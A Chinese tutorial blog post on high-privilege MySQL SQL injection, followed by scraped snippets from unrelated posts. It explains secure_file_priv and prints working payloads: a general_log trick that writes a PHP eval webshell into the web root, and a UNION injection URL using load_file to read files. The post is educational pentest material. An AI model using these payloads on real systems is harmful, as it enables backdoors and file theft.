2. 程式人生 > >sql註入--高權限,load_file讀寫文件

sql註入--高權限,load_file讀寫文件

阿新 發佈:2018-05-01
技術 替代 道路 like variable 文件 新特性 特性 HP

1.MYSQL新特性限制文件寫入及替代方法

高版本的MYSQL添加了一個新的特性secure_file_priv,該選項限制了mysql導出文件的權限
secure_file_priv選項

secure_file_priv 

  1、限制mysqld 不允許導入 | 導出
        --secure_file_prive=null

  2、限制mysqld 的導入 | 導出 只能發生在/tmp/目錄下
      --secure_file_priv=/tmp/

  3、不對mysqld 的導入 | 導出做限制
              --secure_file_priv= 

linux
cat /etc/my.cnf
    [mysqld]
    secure_file_priv= 

win
    my.ini
       [mysqld]
     secure_file_priv=

查看secure_file_priv

show global variables like ‘%secure%‘;

高權限註入遇到secure_file_priv

在mysql高版本的配置文件中默認沒有secure_file_priv這個選項,但是你用SQL語句來查看secure_file_priv發現,沒配置這個選項就是NULL,也就是說無法導出文件。
技術分享圖片
替代方法:
要知道路徑

set global general_log=on;set global general_log_file=‘C:/phpStudy/WWW/123.php‘;select ‘<?php eval($_POST[123]) ?>‘;

技術分享圖片
技術分享圖片

2高權限文件讀寫

load_file()讀文件

http://test.com/sqli/Less-1/?id=-1‘ union select 1,load_file(‘c:\\flag.txt‘),3 --+

技術分享圖片

1.路徑使用\\ ,否則會被當作轉義符號
2.路徑使用/
3.盤符根路徑下可用c:admin.txt
4.16進制文件名
5.char(路徑ascii)

into outfile / into dumpfile寫文件

技術分享圖片

sql註入--高權限,load_file讀寫文件

相關推薦

sql--load_file

技術 替代 道路 like variable 文件 新特性 特性 HP 1.MYSQL新特性限制文件寫入及替代方法 高版本的MYSQL添加了一個新的特性secure_file_priv,該選項限制了mysql導出文件的權限 secure_file_priv選項 secure

SQL其實很簡單別一不留神就被利用了

SQL註入 sqlmap SQL防註入 SQL註入這個詞相信大家應該都不陌生,而且每年都會有這樣子的事情發生,下面我先帶大家回憶11年兩期起比較經典的案例事件: 1、SONY索尼事件2011年4月,著名的×××組織Anonymous***SONY一個網站,一星期後才被發現7千萬的用戶個人信息,其中

lnmp.org 安裝環境的root都沒法刪除網站問題解決-轉

權限 網站 opera 如果 情況 題解 site use home rm -rf刪除網站目錄時出現rm: cannot remove `.user.ini‘: Operation not permitted rm -rf刪除網站目錄時出現rm: cannot re

特殊set_uid, 特殊set_gid,特殊stick_bit,軟鏈接, 硬連接

linux特殊權限set_uid特殊權限set_gid特殊權限stick_bit軟鏈接文件硬連接文件特殊權限set_uids: set_uid改密碼的文件:當普通用戶set_uid執行這個命令時,就會臨時擁有root用戶的身份對一個文件執行set_uid命令,前提是這個文件是一個二進制的文件,而且是一個可執行

特殊set_uidset_gidstick_bit軟連接硬連接

linux2.18特殊權限set_uid我們之前有用過passwd這個文件這個文件是什麽權限那。我們用which看一下。可以看到他是紅色的,也可以看到他的權限是rwsr-xr-x平時我們看到的都是rwx沒有s的這個權限,其實他就是set_uid權限set_uid的作用:我們Linux系統是一個比較安全的系統,

特殊set_uid /特殊set_gid/特殊stick_bit/軟鏈接/硬連接

弊端 uid 不存在 工作 命令 可執行文件 bsp ls -l 無法創建 2.18 特殊權限set_uid 2.19 特殊權限set_gid 2.20 特殊權限stick_bit 2.21 軟鏈接文件 2.22 硬連接文件

系統默認、網站比較安全權、默認控制命令umask、系統屬性(屬性)、特殊

linux 12位權限體系 作者:George歸檔:學習筆記2018/1/2 補充:vimtutor :幫助記憶vim 快捷鍵 本章正題:linux默認權限、網站比較安全權限、默認權限控制命令、umask、文件系統屬性(文件屬性)、特殊權限、根據權限查找文件 1.1 linux系統默認權限1.1.1 l

Deepin-安裝()

示例 deepin nbsp 加權 info node 文件 bubuko linux 在安裝NODE管理模塊N時,遇到了權限問題 1.給予程序讀寫權限(僅限文件夾) 查看權限:ls -l 或 ls 添加權限: 示例:chmod +rw xx

第五天 設置acl attr 內容排序sort uniq diff

tar 直接 lis 文件的權限 過濾 mit 小s passwd .html linux root組 不是管理員角色 root組並不是有root權限 useradd -r -m r一般配合m使用 服務器讓每個uid最好一樣,統一標準化管理 token(uid ,g

用numpy計算成交量加權平均價格(VWAP)並實現

算法 txt log ack etx png del pack pan VWAP(Volume-Weighted Average Price,成交量加權平均價格)是一個非常重要的經濟學量,它代表著金融資產的“平均”價格。某個價格的成交量越高,該價格所

Java中文亂碼解決

中文亂碼解決 eat 存在 讀文件 如果 清空 writer 讀寫 utf 讀文件:使用new BufferedReader(new InputStreamReader(new FileInputStream(file), "UTF-8"));      StringBu

c#配置問題以及簡單防止sql連接池問題sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

84)PHPSQL基礎講解

ont ima pan cnblogs img 代碼 str font http 怎麽預防:        填寫防止SQL註入的代碼:     84)PHP,SQL註入基礎講解

18)添加引號轉移函數防止SQL

factor isset art .com md5 ati 出錯 pri 取數據 目錄機構:      然後我的改動代碼:     MysqlDB.class.php      1 <?php 2 3 /** 4

解析數據庫以及SQL大佬勿噴

min 數據結構 了解 sql語句 我只 md5 服務 pass 進行 1.什麽是數據庫? 數據庫(Database)是按照數據結構來組織、存儲和管理數據的倉庫,它產生於距今六十多年前,隨著信息技術和市場的發展,特別是二十世紀九十年代以後,數據管理不再僅僅是存儲和管理數據,

WAF——針對Web應用發起的攻擊包括但不限於以下攻擊類型:SQL、XSS跨站、Webshell上傳、命令、非法HTTP協議請求、非授權訪問等

授權 文件訪問 http協議 火墻 針對 str sql 包括 fire 核心概念 WAF Web應用防火墻(Web Application Firewall),簡稱WAF。 Web攻擊 針對Web應用發起的攻擊,包括但不限於以下攻擊類型:SQL註入、XSS跨站、Websh

占位符SQL

switch rac () ems 控制臺 程序 bsp ras ansi 這兩天在上課時被同學拿了一段代碼問我,這段代碼有什麽問題,我看了一會說:Connection和PreparedStatement都沒關。他說不止這方面的問題,還有sql註入的問題,我就堅決的說使用了

解決 SQL Server 所有帳號無 sysadmin 且未啟用 SQL Server 身份驗證sa 帳號也未啟用的問題

服務 sta gem 編輯 ble word mode 編輯器 with 解決 未啟用 SQL Server 身份驗證 的問題: 1. 運行 regedit,進入註冊表編輯器 2. 打開:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Micro

【Statement和PreparedStatement有什麽區別?哪個性能更好?預編譯語句防止sql問題】

dstat () 驅動程序 對象 生成 from result 查詢語句 驅動 答:與Statement相比,①PreparedStatement接口代表預編譯的語句,它主要的優勢在於可以減少SQL的編譯錯誤並增加SQL的安全性(減少SQL註射攻擊的可能性);②Prepar

[Js-JDBC]SQL及解決Statement與PreparedStatement

接收 現象 dsta ets 字符 如何 sel 單引號 con SQL註入的含義 用戶在輸入信息中有SQL關鍵字並且參與SQL語句的編譯,導致SQL語句含義扭曲,這種現象被稱為SQL註入 例如: 1 // 在登錄驗證的時候使用如下語句 2 String sql = "s